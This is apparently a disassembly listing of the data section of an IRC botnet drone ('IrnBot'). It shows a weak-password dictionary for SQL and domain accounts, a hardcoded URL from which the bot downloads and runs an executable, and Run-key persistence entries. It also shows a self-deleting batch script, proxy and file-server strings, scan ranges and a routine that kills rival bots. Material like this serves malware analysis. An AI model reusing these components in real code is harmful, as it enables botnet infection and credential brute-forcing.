aBitch		db 'bitch',0            ; DATA XREF: .data:004259B0o
		align 10h
aSlut		db 'slut',0             ; DATA XREF: .data:004259B4o
		align 4
aSex		db 'sex',0              ; DATA XREF: .data:004259B8o
aGod		db 'god',0              ; DATA XREF: .data:004259BCo
aHell		db 'hell',0             ; DATA XREF: .data:004259C0o
		align 4
aHello		db 'hello',0            ; DATA XREF: .data:004259C4o
		align 10h
aDomain		db 'domain',0           ; DATA XREF: .data:004259C8o
		align 4
aDomainpass	db 'domainpass',0       ; DATA XREF: .data:004259CCo
		align 4
aDomainpassword	db 'domainpassword',0   ; DATA XREF: .data:004259D0o
		align 4
aDatabase	db 'database',0         ; DATA XREF: .data:004259D4o
		align 10h
aAccess		db 'access',0           ; DATA XREF: .data:004259D8o
		align 4
aDbpass		db 'dbpass',0           ; DATA XREF: .data:004259DCo
		align 10h
aDbpassword	db 'dbpassword',0       ; DATA XREF: .data:004259E0o
		align 4
aDatabasepass	db 'databasepass',0     ; DATA XREF: .data:004259E4o
		align 4
aData		db 'data',0             ; DATA XREF: .data:004259E8o
		align 4
aDatabasepasswo	db 'databasepassword',0 ; DATA XREF: .data:004259ECo
		align 4
aDb1		db 'db1',0              ; DATA XREF: .data:004259F0o
aDb2		db 'db2',0              ; DATA XREF: .data:004259F4o
aDb1234		db 'db1234',0           ; DATA XREF: .data:004259F8o
		align 4
aSa_0		db 'sa',0               ; DATA XREF: .data:004259FCo
		align 4
aSql		db 'sql',0              ; DATA XREF: .data:00425A00o
aSqlpassoainsta	db 'sqlpassoainstall',0 ; DATA XREF: .data:00425A04o
		align 4
aOrainstall	db 'orainstall',0       ; DATA XREF: .data:00425A08o
		align 10h
aOracle		db 'oracle',0           ; DATA XREF: .data:00425A0Co
		align 4
aIbm		db 'ibm',0              ; DATA XREF: .data:00425A10o
aCisco		db 'cisco',0            ; DATA XREF: .data:00425A14o
		align 4
aDell		db 'dell',0             ; DATA XREF: .data:00425A18o
		align 4
aCompaq		db 'compaq',0           ; DATA XREF: .data:00425A1Co
		align 4
aSiemens	db 'siemens',0          ; DATA XREF: .data:00425A20o
aHp		db 'hp',0               ; DATA XREF: .data:00425A24o
		align 10h
aNokia		db 'nokia',0            ; DATA XREF: .data:00425A28o
		align 4
aXp		db 'xp',0               ; DATA XREF: .data:00425A2Co
		align 4
aControl	db 'control',0          ; DATA XREF: .data:00425A30o
aOffice		db 'office',0           ; DATA XREF: .data:00425A34o
		align 4
aBlank		db 'blank',0            ; DATA XREF: .data:00425A38o
		align 4
aWinpass	db 'winpass',0          ; DATA XREF: .data:00425A3Co
aMain		db 'main',0             ; DATA XREF: .data:00425A40o
		align 4
aLan		db 'lan',0              ; DATA XREF: .data:00425A44o
aInternet_0	db 'internet',0         ; DATA XREF: .data:00425A48o
		align 4
aIntranet	db 'intranet',0         ; DATA XREF: .data:00425A4Co
		align 10h
aStudent	db 'student',0          ; DATA XREF: .data:00425A50o
aTeacher	db 'teacher',0          ; DATA XREF: .data:00425A54o
aStaff		db 'staff',0            ; DATA XREF: .data:00425A58o
		align 4
aBadAllocatio_3	db 'bad allocation',0   ; DATA XREF: .data:0042582Co
		align 4
aHardwareDescri	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
					; DATA XREF: sub_41AD77+21o
		align 4
aMhz		db '~MHz',0             ; DATA XREF: sub_41AD77+4Ao
		align 10h
aProcessornames	db 'ProcessorNameString',0 ; DATA XREF: sub_41AD77+6Do
aS_7		db '%s',0               ; DATA XREF: sub_41AD77+ADo
		align 4
aSC_0		db '%s%c',0             ; DATA XREF: sub_41AD77+112o
		align 10h
aUnknown	db 'Unknown',0          ; DATA XREF: sub_41AD77+165o
aHardwareDesc_0	db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
					; DATA XREF: sub_41AD77+1B7o
aSysinfo	db 'sysinfo',0          ; DATA XREF: .text:0041CC06o
aNetinfo	db 'netinfo',0          ; DATA XREF: .text:0041CC22o
aBadAllocatio_4	db 'bad allocation',0   ; DATA XREF: .data:00425A60o
		align 4
aS4		db 's4',0               ; DATA XREF: .text:0041CBCEo
		align 4
aS4_stop	db 's4.stop',0          ; DATA XREF: .text:0041CBEAo
aS4SocketError	db 'S4: socket() Error',0
		align 4
aS4BindError	db 'S4: bind() Error',0 ; DATA XREF: sub_4145BE+A8o
		align 4
aS4ListenError	db 'S4: listen() Error',0 ; DATA XREF: sub_4145BE+C1o
		align 10h
aS4SI		db 'S4: %s:%i',0        ; DATA XREF: sub_4145BE+132o
		align 4
aSc		db 'SC',0               ; DATA XREF: sub_4145BE+18Eo
		align 10h
aBadAllocatio_5	db 'bad allocation',0   ; DATA XREF: .data:00425A64o
		align 10h
aHttp		db 'http',0             ; DATA XREF: .text:0041CBB2o
		align 4
aBadAllocatio_6	db 'bad allocation',0   ; DATA XREF: .data:00425A68o
		align 4
aI_quit		db 'i.quit',0           ; DATA XREF: .text:0041CB5Eo
		align 10h
aI_join		db 'i.join',0           ; DATA XREF: .text:0041CB7Ao
		align 4
aI_part		db 'i.part',0           ; DATA XREF: .text:0041CB96o
		align 10h
aBadAllocatio_7	db 'bad allocation',0   ; DATA XREF: .data:00425A6Co
		align 10h
aHttp217_67_229	db 'http://217.67.229.212/phpbb/uploads/jpb.exe',0
					; DATA XREF: sub_41C135+51o
aCJpb_exe	db 'C:\jpb.exe',0       ; DATA XREF: sub_41C135+84o
		align 4
aDl		db 'DL',0               ; DATA XREF: sub_41C135+E9o
		align 4
aDownload	db 'download',0         ; DATA XREF: .text:0041CB26o
		align 4
aUpdate		db 'update',0           ; DATA XREF: .text:0041CB42o
		align 10h
aMozilla5_0	db 'Mozilla/5.0',0      ; DATA XREF: sub_41BED6+33o
aDlDownloadingS	db 'DL: Downloading %s to %s',0 ; DATA XREF: sub_41BED6+51o
		align 4
aDlFailedBadLoc	db 'DL: Failed; Bad Location.',0 ; DATA XREF: sub_41BED6:loc_41C0A0o
		align 4
aDlDownloadSIBy	db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
					; DATA XREF: sub_41BED6+156o
		align 10h
aMainUninstalli	db 'Main: Uninstalling Drone',0 ; DATA XREF: sub_41BED6+1A7o
		align 4
aDlFailedToUpda	db 'DL: Failed To Update',0 ; DATA XREF: sub_41BED6:loc_41C0A7o
		align 4
aDlErrorExecuti	db 'DL: Error Executing File.',0 ; DATA XREF: sub_41BED6+1EDo
		align 10h
aDlExecutedFile	db 'DL: Executed File: %s',0 ; DATA XREF: sub_41BED6+1FCo
		align 4
aDlFailedBadUrl	db 'DL: Failed; Bad URL',0 ; DATA XREF: sub_41BED6:loc_41C0EEo
aDlFailedWinine	db 'DL: Failed; WinINET Error',0 ; DATA XREF: sub_41BED6:loc_41C0F5o
		align 4
aBadAllocatio_8	db 'bad allocation',0   ; DATA XREF: .data:00425A70o
		align 4
aBadAllocatio_9	db 'bad allocation',0   ; DATA XREF: .data:00425A74o
		align 4
aTftpServer	db 'TFTP Server',0      ; DATA XREF: sub_41BD26+5Ao
aRb		db 'rb',0               ; DATA XREF: sub_41B981+44o
		align 4
aTftpSendComple	db 'TFTP: Send Complete To %s. %d Total Sends',0
					; DATA XREF: sub_41B981+1A4o
		align 4
aBadAllocati_10	db 'bad allocation',0   ; DATA XREF: .data:00425A78o
		align 8
		dd 428A2F98h, 71374491h, 0B5C0FBCFh, 0E9B5DBA5h, 3956C25Bh
		dd 59F111F1h, 923F82A4h, 0AB1C5ED5h, 0D807AA98h, 12835B01h
		dd 243185BEh, 550C7DC3h, 72BE5D74h, 80DEB1FEh, 9BDC06A7h
		dd 0C19BF174h, 0E49B69C1h, 0EFBE4786h, 0FC19DC6h, 240CA1CCh
		dd 2DE92C6Fh, 4A7484AAh, 5CB0A9DCh, 76F988DAh, 983E5152h
		dd 0A831C66Dh, 0B00327C8h, 0BF597FC7h, 0C6E00BF3h, 0D5A79147h
		dd 6CA6351h, 14292967h,	27B70A85h, 2E1B2138h, 4D2C6DFCh
		dd 53380D13h, 650A7354h, 766A0ABBh, 81C2C92Eh, 92722C85h
		dd 0A2BFE8A1h, 0A81A664Bh, 0C24B8B70h, 0C76C51A3h, 0D192E819h
		dd 0D6990624h, 0F40E3585h, 106AA070h, 19A4C116h, 1E376C08h
		dd 2748774Ch, 34B0BCB5h, 391C0CB3h, 4ED8AA4Ah, 5B9CCA4Fh
		dd 682E6FF3h, 748F82EEh, 78A5636Fh, 84C87814h, 8CC70208h
		dd 90BEFFFAh, 0A4506CEBh, 0BEF9A3F7h, 0C67178F2h, 6A09E667h
		dd 0BB67AE85h, 3C6EF372h, 0A54FF53Ah, 510E527Fh, 9B05688Ch
		dd 1F83D9ABh, 5BE0CD19h
dword_41F9F8	dd 0D728AE22h		; DATA XREF: sub_414BC0+318r
dword_41F9FC	dd 428A2F98h		; DATA XREF: sub_414BC0+31Fr
dword_41FA00	dd 23EF65CDh		; DATA XREF: sub_414BC0+548r
dword_41FA04	dd 71374491h		; DATA XREF: sub_414BC0+54Fr
dword_41FA08	dd 0EC4D3B2Fh		; DATA XREF: sub_414BC0+772r
dword_41FA0C	dd 0B5C0FBCFh		; DATA XREF: sub_414BC0+779r
dword_41FA10	dd 8189DBBCh		; DATA XREF: sub_414BC0+9B8r
dword_41FA14	dd 0E9B5DBA5h		; DATA XREF: sub_414BC0+9BFr
dword_41FA18	dd 0F348B538h		; DATA XREF: sub_414BC0+BFEr
dword_41FA1C	dd 3956C25Bh		; DATA XREF: sub_414BC0+C09r
dword_41FA20	dd 0B605D019h		; DATA XREF: sub_414BC0+E80r
dword_41FA24	dd 59F111F1h		; DATA XREF: sub_414BC0+E87r
dword_41FA28	dd 0AF194F9Bh		; DATA XREF: sub_414BC0+10D7r
dword_41FA2C	dd 923F82A4h		; DATA XREF: sub_414BC0+10DEr
dword_41FA30	dd 0DA6D8118h		; DATA XREF: sub_414BC0+1319r
dword_41FA34	dd 0AB1C5ED5h		; DATA XREF: sub_414BC0+1320r
dword_41FA38	dd 0A3030242h		; DATA XREF: sub_414BC0+1569r
dword_41FA3C	dd 0D807AA98h		; DATA XREF: sub_414BC0+1570r
dword_41FA40	dd 45706FBEh		; DATA XREF: sub_414BC0+17ABr
dword_41FA44	dd 12835B01h		; DATA XREF: sub_414BC0+17B2r
dword_41FA48	dd 4EE4B28Ch		; DATA XREF: sub_414BC0+19F3r
dword_41FA4C	dd 243185BEh		; DATA XREF: sub_414BC0+19FAr
dword_41FA50	dd 0D5FFB4E2h		; DATA XREF: sub_414BC0+1C39r
dword_41FA54	dd 550C7DC3h		; DATA XREF: sub_414BC0+1C40r
dword_41FA58	dd 0F27B896Fh		; DATA XREF: sub_414BC0+1E91r
dword_41FA5C	dd 72BE5D74h		; DATA XREF: sub_414BC0+1E9Cr
dword_41FA60	dd 3B1696B1h		; DATA XREF: sub_414BC0+210Dr
dword_41FA64	dd 80DEB1FEh		; DATA XREF: sub_414BC0+2114r
dword_41FA68	dd 25C71235h		; DATA XREF: sub_414BC0+236Ar
dword_41FA6C	dd 9BDC06A7h		; DATA XREF: sub_414BC0+2371r
dword_41FA70	dd 0CF692694h		; DATA XREF: sub_414BC0+25B8r
dword_41FA74	dd 0C19BF174h		; DATA XREF: sub_414BC0+25BFr
		dd 9EF14AD2h, 0E49B69C1h, 384F25E3h, 0EFBE4786h, 8B8CD5B5h
		dd 0FC19DC6h, 77AC9C65h, 240CA1CCh, 592B0275h, 2DE92C6Fh
		dd 6EA6E483h, 4A7484AAh, 0BD41FBD4h, 5CB0A9DCh,	831153B5h
		dd 76F988DAh, 0EE66DFABh, 983E5152h, 2DB43210h,	0A831C66Dh
		dd 98FB213Fh, 0B00327C8h, 0BEEF0EE4h, 0BF597FC7h, 3DA88FC2h
		dd 0C6E00BF3h, 930AA725h, 0D5A79147h, 0E003826Fh, 6CA6351h
		dd 0A0E6E70h, 14292967h, 46D22FFCh, 27B70A85h, 5C26C926h
		dd 2E1B2138h, 5AC42AEDh, 4D2C6DFCh, 9D95B3DFh, 53380D13h
		dd 8BAF63DEh, 650A7354h, 3C77B2A8h, 766A0ABBh, 47EDAEE6h
		dd 81C2C92Eh, 1482353Bh, 92722C85h, 4CF10364h, 0A2BFE8A1h
		dd 0BC423001h, 0A81A664Bh, 0D0F89791h, 0C24B8B70h, 654BE30h
		dd 0C76C51A3h, 0D6EF5218h, 0D192E819h, 5565A910h, 0D6990624h
		dd 5771202Ah, 0F40E3585h, 32BBD1B8h, 106AA070h,	0B8D2D0C8h
		dd 19A4C116h, 5141AB53h, 1E376C08h, 0DF8EEB99h,	2748774Ch
		dd 0E19B48A8h, 34B0BCB5h, 0C5C95A63h, 391C0CB3h, 0E3418ACBh
		dd 4ED8AA4Ah, 7763E373h, 5B9CCA4Fh, 0D6B2B8A3h,	682E6FF3h
		dd 5DEFB2FCh, 748F82EEh, 43172F60h, 78A5636Fh, 0A1F0AB72h
		dd 84C87814h, 1A6439ECh, 8CC70208h, 23631E28h, 90BEFFFAh
		dd 0DE82BDE9h, 0A4506CEBh, 0B2C67915h, 0BEF9A3F7h, 0E372532Bh
		dd 0C67178F2h, 0EA26619Ch, 0CA273ECEh, 21C0C207h, 0D186B8C7h
		dd 0CDE0EB1Eh, 0EADA7DD6h, 0EE6ED178h, 0F57D4F7Fh, 72176FBAh
		dd 6F067AAh, 0A2C898A6h, 0A637DC5h, 0BEF90DAEh,	113F9804h
		dd 131C471Bh, 1B710B35h, 23047D84h, 28DB77F5h, 40C72493h
		dd 32CAAB7Bh, 15C9BEBCh, 3C9EBE0Ah, 9C100D4Ch, 431D67C4h
		dd 0CB3E42B6h, 4CC5D4BEh, 0FC657E2Ah, 597F299Ch, 3AD6FAECh
		dd 5FCB6FABh, 4A475817h, 6C44198Ch, 0C1059ED8h,	0CBBB9D5Dh
		dd 367CD507h, 629A292Ah, 3070DD17h, 9159015Ah, 0F70E5939h
		dd 152FECD8h, 0FFC00B31h, 67332667h, 68581511h,	8EB44A87h
		dd 64F98FA7h, 0DB0C2E0Dh, 0BEFA4FA4h, 47B5481Dh, 90h dup(0)
byte_41FEF8	db 8, 0C9h		; DATA XREF: sub_414B90+17o
; ---------------------------------------------------------------------------
		mov	esp, 9E667F3h
		push	3Bh
		cmpsd
		retf	8584h
; ---------------------------------------------------------------------------
		db 0AEh, 67h, 0BBh
		dd 0FE94F82Bh, 3C6EF372h, 5F1D36F1h, 0A54FF53Ah, 0ADE682D1h
		dd 510E527Fh, 2B3E6C1Fh, 9B05688Ch, 0FB41BD6Bh,	1F83D9ABh
		dd 137E2179h, 5BE0CD19h, 90h dup(0)
dword_420178	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_420198	dd 255C7325h, 73h	; DATA XREF: sub_417776+DCo
aSoftwareMicros	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417776+10Co
		align 10h
aSoftwareMicr_0	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417776+14Fo
		align 10h
aSS_3		db '%s\%s',0            ; DATA XREF: sub_417909+BAo
		align 4
aSoftwareMicr_1	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417909+F9o
		align 4
aSoftwareMicr_2	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_417909+14Do
		align 4
aBadAllocati_11	db 'bad allocation',0   ; DATA XREF: .data:00425C2Co
		align 4
aInstall	db '--install ',0       ; DATA XREF: sub_41C28D+61o
		align 4
aSS_6		db '%s\%s',0            ; DATA XREF: sub_41C28D+10Fo
		align 4
aSSS_0		db '%s %s%s',0          ; DATA XREF: sub_41C28D+1DDo
aS_11		db '%s',0               ; DATA XREF: sub_41C28D+273o
		align 4
aRm		db 'RM',0               ; DATA XREF: sub_41C28D+35Eo
		align 4
aBk		db 'BK',0               ; DATA XREF: sub_41C28D+397o
		align 10h
aUnm		db 'UNM',0              ; DATA XREF: sub_41C28D+3BCo
aBadAllocati_12	db 'bad allocation',0   ; DATA XREF: .data:00426834o
		align 4
aSS_7		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_418A8C+42o
aSS_8		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_41881F+159o
aSS_9		db '%s-%s',0            ; DATA XREF: sub_41881F+1D6o
		align 4
aSSSS00S	db '%s %s',0Dh,0Ah      ; DATA XREF: sub_41881F+24Do
		db '%s %s 0 0 :%s',0Dh,0Ah,0
		align 4
asc_4202E4	db 0Dh,0Ah,0		; DATA XREF: sub_4186F1+7Eo
		align 4
aS_10		db '%s',0               ; DATA XREF: sub_4186F1+B6o
		align 4
asc_4202EC	db 0Dh,0Ah,0		; DATA XREF: sub_4186F1+CBo
		align 10h
aSSS_1		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_417B51+C2o
		align 4
aS_12		db '%s',0               ; DATA XREF: sub_41802D+4Ao
		align 10h
asc_420300	db ' :',0               ; DATA XREF: sub_41802D+7Eo
		align 4
aS_13		db '%s',0               ; DATA XREF: sub_41802D+8Ao
		align 4
asc_420308:				; DATA XREF: sub_41802D+E1o
		unicode	0, < >,0
aS_14		db '%s',0               ; DATA XREF: sub_41802D+FAo
		align 10h
asc_420310:				; DATA XREF: sub_41802D+124o
		unicode	0, < >,0
aSS_10		db '%s %s',0Dh,0Ah,0    ; DATA XREF: sub_41802D+24Ao
aSSS_2		db '%s %s %s',0Dh,0Ah,0 ; DATA XREF: sub_41802D+31Eo
		align 4
a001		db '001',0              ; DATA XREF: sub_41802D+33Ao
aSSSSSS		db '%s %s %s',0Dh,0Ah   ; DATA XREF: sub_41802D+3D3o
		db '%s %s %s',0Dh,0Ah,0
		align 4
a332		db '332',0              ; DATA XREF: sub_41802D+417o
asc_420348	db ' :',0               ; DATA XREF: sub_41802D+499o
		align 4
aS_0		db '%s',0               ; DATA XREF: sub_41802D+4A5o
		align 10h
asc_420350:				; DATA XREF: sub_41802D+4D9o
		unicode	0, <!>,0
aS_1		db '%s',0               ; DATA XREF: sub_41802D+4E5o
		align 4
a332_0		db '332',0              ; DATA XREF: sub_41802D+52Do
aS_2		db '%s',0               ; DATA XREF: sub_41802D+546o
		align 10h
aS_3		db '%s',0               ; DATA XREF: sub_41802D+5B1o
		align 4
aS_4		db '%s',0               ; DATA XREF: sub_41802D+5DFo
		align 4
asc_420368:				; DATA XREF: sub_41802D+64Eo
		unicode	0, <;>,0
asc_42036C:				; DATA XREF: sub_41802D:loc_418682o
		unicode	0, <;>,0
asc_420370:				; DATA XREF: sub_41802D:loc_41868Fo
		unicode	0, <;>,0
asc_420374:				; DATA XREF: sub_417E66+Co
		unicode	0, < >,0
aS_8		db '-s',0               ; DATA XREF: sub_417E66+27o
		align 4
aS_9		db '/s',0               ; DATA XREF: sub_417E66+3Fo
		align 10h
asc_420380:				; DATA XREF: sub_417E66:loc_417EBAo
		unicode	0, < >,0
aQwertyuiopasdf	db 'qwertyuiopasdfghjklzxcvbnmQWERTYUIOPLKJHGFDSAZXCVBNM',0
					; DATA XREF: sub_417C7B+21o
		align 4
asc_4203BC:				; DATA XREF: sub_417C7B+5Eo
		unicode	0, <[>,0
aSS		db '%s%s|',0            ; DATA XREF: sub_417C7B+95o
		align 4
aSS_0		db '%s%s|',0            ; DATA XREF: sub_417C7B+C5o
		align 10h
aSp		db '%sP|',0             ; DATA XREF: sub_417C7B+F0o
		align 4
aS0I64u		db '%s0%I64u|',0        ; DATA XREF: sub_417C7B+12Fo
		align 4
aSI64u		db '%s%I64u|',0         ; DATA XREF: sub_417C7B+150o
		align 10h
aSC		db '%s%c',0             ; DATA XREF: sub_417C7B+18Fo
		align 4
aS		db '%s]',0              ; DATA XREF: sub_417C7B+1BAo
aBadAllocati_13	db 'bad allocation',0   ; DATA XREF: .data:00426B90o
		align 4
aHs		db 'HS',0               ; DATA XREF: sub_419507+28o
		align 10h
aIrnbot		db 'IrnBot',0           ; DATA XREF: sub_419430+89o
		align 4
aSS_1		db '%s\%s',0            ; DATA XREF: sub_41930F+4Eo
		align 10h
aGet		db 'GET',0              ; DATA XREF: sub_418D42+B7o
aQue?		db 'Que?',0             ; DATA XREF: sub_418D42+C7o
		align 10h
aHttp1_1501NotI	db 'HTTP/1.1 501 Not Implemented',0Dh,0Ah ; DATA XREF: sub_418D42+10Fo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
aSSSS		db '%s\%s\%s%s',0       ; DATA XREF: sub_418D42+229o
		align 4
aSSS		db '%s\%s\%s',0         ; DATA XREF: sub_418D42+1F2o
		align 10h
aSS_4		db '%s\%s',0            ; DATA XREF: sub_418D42+25Ao
		align 4
aQue?_0		db 'Que?',0             ; DATA XREF: sub_418D42+3A8o
		align 10h
aQue?_1		db 'Que?',0             ; DATA XREF: sub_418D42+2BEo
		align 4
aHttp1_1200OkCo	db 'HTTP/1.1 200 ok',0Dh,0Ah ; DATA XREF: sub_418D42+3FCo
		db 'Content-Length: %d',0Dh,0Ah
		db 'Connection: close',0Dh,0Ah
		db 0Dh,0Ah,0
		align 4
aHttpTransferD_	db 'HTTP: Transfer: %d.%d.%d.%d (N/A). %d Total Sends.',0
					; DATA XREF: sub_418D42+51Do
		align 4
aHttpTransfer_0	db 'HTTP: Transfer: %d.%d.%d.%d (%s). %d Total Sends.',0
					; DATA XREF: sub_418D42+54Ao
		align 4
asc_42054C	db 0Dh,0Ah,0		; DATA XREF: sub_418CAF+11o
		align 10h
asc_420550:				; DATA XREF: sub_418CAF:loc_418CDBo
		unicode	0, < >,0
asc_420554:				; DATA XREF: sub_418CAF+3Do
		unicode	0, < >,0
asc_420558:				; DATA XREF: sub_418CAF+54o
		unicode	0, < >,0
asc_42055C	db 0Dh,0Ah		; DATA XREF: sub_418CAF+78o
		db 0Dh,0Ah,0
		align 4
asc_420564	db '%x',0               ; DATA XREF: sub_418B86+CAo
		align 4
aBadAllocati_14	db 'bad allocation',0
		align 4
aS_15		db '%s',0               ; DATA XREF: sub_41BDAA+74o
		align 4
aSX		db '%s%X',0             ; DATA XREF: sub_41BDAA+ECo
		align 4
aBadAllocati_15	db 'bad allocation',0
		align 4
a@echoOff1DelSI	db '@echo off',0Dh,0Ah  ; DATA XREF: sub_4198AD+7Eo
		db ':1',0Dh,0Ah
		db 'del "%s"',0Dh,0Ah
		db 'if exist "%s" goto 1',0Dh,0Ah
		db 'del "%%0"',0Dh,0Ah,0
		align 10h
aSTmpIIICCC_bat	db '%s\tmp-%i%i%i-%c%c%c.bat',0 ; DATA XREF: sub_4198AD+FCo
		align 4
aW:					; DATA XREF: sub_4198AD+110o
		unicode	0, <w>,0
aS_6		db '%s',0               ; DATA XREF: sub_4198AD+12Bo
		align 4
aRegistryMonito	db 'Registry Monitor',0 ; DATA XREF: sub_419C67+D9o
		align 4
aSoftwareMicr_3	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_419C67+12Ao
		align 4
aQuitSYouKill_0	db 'QUIT :%s YOU KILLED ME :<',0Dh,0Ah,0
aQuitSYouKilled	db 'QUIT :%s YOU KILLED ME :< --UPDATED',0Dh,0Ah,0
					; DATA XREF: sub_419C67+15Ao
		align 4
aRemoveAuthenti	db 'Remove: Authentication Failed.',0
		align 4
aD_D_D_D_0	db '%d.%d.%d.%d',0      ; DATA XREF: sub_4197B6+4Eo
aVis		db 'VIS',0              ; DATA XREF: sub_419641+42o
a2k3		db '2K3',0              ; DATA XREF: sub_419641+55o
aXp_0		db 'XP',0               ; DATA XREF: sub_419641+62o
		align 4
a2k		db '2K',0               ; DATA XREF: sub_419641+6Eo
		align 4
aMe		db 'ME',0               ; DATA XREF: sub_419641+81o
		align 4
a98		db '98',0               ; DATA XREF: sub_419641+8Eo
		align 10h
aNt		db 'NT',0               ; DATA XREF: sub_419641+A0o
		align 4
a95		db '95',0               ; DATA XREF: sub_419641+ADo
		align 4
aUnk		db 'UNK',0              ; DATA XREF: sub_419641:loc_4196F5o
aOsMicrosoftWin	db '[OS: Microsoft Windows %s %s (%i.%i build %i)]',0
					; DATA XREF: sub_419641+108o
		align 4
aS_5		db '%s',0               ; DATA XREF: sub_419641+13Ao
		align 10h
a192_168__	db '192.168.*.*',0      ; DATA XREF: sub_419B37+32o
a10___		db '10.*.*.*',0         ; DATA XREF: sub_419B37+46o
		align 4
a111___		db '111.*.*.*',0        ; DATA XREF: sub_419B37+5Ao
		align 4
a15___		db '15.*.*.*',0         ; DATA XREF: sub_419B37+6Eo
		align 10h
a16___		db '16.*.*.*',0         ; DATA XREF: sub_419B37+82o
		align 4
a101___		db '101.*.*.*',0        ; DATA XREF: sub_419B37+96o
		align 4
a110___		db '110.*.*.*',0        ; DATA XREF: sub_419B37+A6o
		align 4
a112___		db '112.*.*.*',0        ; DATA XREF: sub_419B37+B6o
		align 10h
a170_65__	db '170.65.*.*',0       ; DATA XREF: sub_419B37+C6o
		align 4
a172_D__	db '172.%d.*.*',0       ; DATA XREF: sub_419B37+E0o
		align 4
aBadAllocati_16	db 'bad allocation',0
		align 4
aBadAllocati_17	db 'bad allocation',0
		align 4
aMessageboxa_0	db 'MessageBoxA',0      ; DATA XREF: sub_419E67+12o
aUser32_dll	db 'user32.dll',0       ; DATA XREF: sub_419E67+17o
		align 10h
dword_4207B0	dd 0D010Fh, 0C3000000h,	0 ; DATA XREF: sub_419DDC+19o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 20646162h, 6F6C6C61h
		dd 69746163h, 6E6Fh
dword_4207DC	dd 63257325h, 0		; DATA XREF: sub_419EC1+55o
		dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh
dword_4207F4	dd 6C6E6977h, 6E6F676Fh, 6578652Eh, 0 ;	DATA XREF: sub_41A690+3Co
dword_420804	dd 68637673h, 2E74736Fh, 657865h ; DATA	XREF: sub_41A690+44o
dword_420810	dd 76726573h, 73656369h, 6578652Eh, 0 ;	DATA XREF: sub_41A690+4Co
aOpenthread	db 'OpenThread',0       ; DATA XREF: sub_41A690+5Fo
		align 4
aKernel32_dll_0	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+64o
		align 4
aOpenprocess	db 'OpenProcess',0      ; DATA XREF: sub_41A690+78o
aKernel32_dll_1	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+7Do
		align 4
aCreatetoolhelp	db 'CreateToolhelp32Snapshot',0 ; DATA XREF: sub_41A690+8Co
		align 4
aKernel32_dll_2	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+91o
		align 4
aProcess32first	db 'Process32First',0   ; DATA XREF: sub_41A690+A0o
		align 4
aKernel32_dll_3	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+A5o
		align 4
aProcess32next	db 'Process32Next',0    ; DATA XREF: sub_41A690+B4o
		align 4
aKernel32_dll_4	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+B9o
		align 4
aModule32first	db 'Module32First',0    ; DATA XREF: sub_41A690+C8o
		align 4
aKernel32_dll_5	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+CDo
		align 4
aModule32next	db 'Module32Next',0     ; DATA XREF: sub_41A690+DCo
		align 4
aKernel32_dll_6	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+E1o
		align 4
aThread32first	db 'Thread32First',0    ; DATA XREF: sub_41A690+F0o
		align 4
aKernel32_dll_7	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+F5o
		align 4
aThread32next	db 'Thread32Next',0     ; DATA XREF: sub_41A690+104o
		align 4
aKernel32_dll_8	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+109o
		align 4
aReadprocessmem	db 'ReadProcessMemory',0 ; DATA XREF: sub_41A690+118o
		align 4
aKernel32_dll_9	db 'kernel32.dll',0     ; DATA XREF: sub_41A690+11Do
		align 4
aGetmodulefilen	db 'GetModuleFileNameExA',0 ; DATA XREF: sub_41A690+12Co
		align 10h
aPsapi_dll	db 'psapi.dll',0        ; DATA XREF: sub_41A690+131o
		align 4
aSS_2		db '%s\%s',0            ; DATA XREF: sub_41A690+1F5o
		align 4
aSedebugprivile	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A690+2BEo
		align 4
aSedebugprivi_0	db 'SeDebugPrivilege',0 ; DATA XREF: sub_41A690+365o
		align 4
aSystem		db 'System',0           ; DATA XREF: sub_41A690+390o
		align 4
aBotKilledS	db 'Bot Killed: %s',0   ; DATA XREF: sub_41A690+451o
		align 4
aSoftwareMicr_4	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0
					; DATA XREF: sub_41A28F+36o
		align 4
aSoftwareMicr_5	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',0
					; DATA XREF: sub_41A28F+3Do
		align 4
aSoftwareMicr_6	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx',0
					; DATA XREF: sub_41A28F+44o
aSoftwareMicr_7	db 'SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices',0
					; DATA XREF: sub_41A28F+4Bo
		align 4
aSystemControls	db 'SYSTEM\ControlSet001\Services\Eventlog\System',0
					; DATA XREF: sub_41A45D+26o
		align 4
aSS_5		db '%s\%s',0            ; DATA XREF: sub_41A45D+E4o
		align 4
aLdm		db 'LDM',0              ; DATA XREF: sub_41A45D+118o
aNetdde		db 'NetDDE',0           ; DATA XREF: sub_41A45D+12Bo
		align 4
aEventmessagefi	db 'EventMessageFile',0 ; DATA XREF: sub_41A45D+142o
		align 4
aBadAllocati_18	db 'bad allocation',0
		align 4
